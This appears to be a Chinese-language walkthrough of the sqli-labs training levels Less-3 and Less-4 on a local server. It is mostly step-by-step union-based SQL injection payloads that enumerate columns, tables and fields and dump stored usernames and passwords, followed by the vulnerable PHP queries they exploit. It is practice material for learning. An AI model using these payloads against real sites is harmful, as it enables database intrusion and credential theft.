当我们在网址之后写上‘的时候
http://127.0.0.1/sqli-labs-kali2/Less-3/?id=1%27
提示错误
他说有括号,然后后面还有一些其他的
于是继续加上括号,并且忽略其他的
http://127.0.0.1/sqli-labs-kali2/Less-3/?id=1’) --+
成功访问,于是就剩下正常的步骤来写网址了
- 爆列数以及显示回显位
http://127.0.0.1/sqli-labs-kali2/Less-3/?id=1%27)%20%20order%20by%203%20%20–+
结果是3列
http://127.0.0.1/sqli-labs-kali2/Less-3/?id=-1%27)%20%20union%20select%201,2,3%20–+
回显位2,3 - 爆数据库
http://127.0.0.1/sqli-labs-kali2/Less-3/?id=-1%27)%20%20union%20select%201,database(),version()%20–+
- 爆表名
http://127.0.0.1/sqli-labs-kali2/Less-3/?id=-1%27)%20%20union%20select%201,database(),group_concat(table_name)%20from%20information_schema.tables%20where%20%20table_schema=0x7365637572697479–+
-
爆字段名
http://127.0.0.1/sqli-labs-kali2/Less-3/?id=-1%27)%20%20union%20select%201,database(),group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20and%20table_name=0x7573657273–+
-
爆账户
http://127.0.0.1/sqli-labs-kali2/Less-3/?id=-1%27)%20union%20select%201,group_concat(username),group_concat(password)%20from%20users%20–+
第二题
http://127.0.0.1/sqli-labs-kali2/Less-4/?id=1%22
报错 提示括号,所以加上括号并且忽略之后的字符
http://127.0.0.1/sqli-labs-kali2/Less-4/?id=1%22)%20–+
访问成功
其他的都是在上面的数据上构造,不详细写了
分析
- 看第一题PHP的源码
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
构造主要是满足括号
- 看第二题PHP源码
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
构造主要是满括号